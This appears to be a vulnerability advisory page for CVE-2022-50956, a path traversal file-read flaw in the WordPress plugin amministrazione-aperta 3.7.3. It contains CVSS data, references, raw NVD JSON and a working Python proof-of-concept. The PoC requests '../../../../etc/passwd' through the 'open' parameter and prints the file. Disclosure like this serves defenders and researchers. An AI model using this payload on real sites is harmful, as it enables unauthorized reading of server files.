CVE-2022-50956

Description

WordPress Plugin amministrazione-aperta 3.7.3 contains a local file read vulnerability that allows unauthenticated attackers to read arbitrary files by exploiting insufficient input validation in the open parameter. Attackers can supply file paths through the open GET parameter in dispatcher.php to include and read sensitive files accessible to the web server.

CVSS Details

CVSS Score

6.2

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

amministrazione-aperta <= 3.7.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def check_vulnerability(target_url):
    # Vulnerable endpoint path
    vuln_path = "/wp-content/plugins/amministrazione-aperta/dispatcher.php"
    # Payload to read /etc/passwd
    payload = "?open=../../../../etc/passwd"
    
    full_url = target_url + vuln_path + payload
    
    try:
        response = requests.get(full_url, timeout=10)
        if response.status_code == 200 and "root:" in response.text:
            print(f"[+] Vulnerability confirmed at {target_url}")
            print(f"[+] Response content:\n{response.text}")
        else:
            print("[-] Target is not vulnerable or file not found.")
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    target = "http://example.com"
    check_vulnerability(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2022-50956
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2022-50956
[3] CVE Details https://www.cvedetails.com/cve/CVE-2022-50956/
[4] VulDB https://vuldb.com/cve/CVE-2022-50956
[5] https://wordpress.org/plugins/amministrazione-aperta/
[6] https://www.exploit-db.com/exploits/50838
[7] https://www.vulncheck.com/advisories/wordpress-plugin-amministrazione-aperta-local-file-read

Raw JSON Data

JSON

{"cve": {"id": "CVE-2022-50956", "sourceIdentifier": "[email protected]", "published": "2026-05-10T13:16:33.180", "lastModified": "2026-05-12T14:24:15.210", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "WordPress Plugin amministrazione-aperta 3.7.3 contains a local file read vulnerability that allows unauthenticated attackers to read arbitrary files by exploiting insufficient input validation in the open parameter. Attackers can supply file paths through the open GET parameter in dispatcher.php to include and read sensitive files accessible to the web server."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://wordpress.org/plugins/amministrazione-aperta/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/50838", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/wordpress-plugin-amministrazione-aperta-local-file-read", "source": "[email protected]"}]}}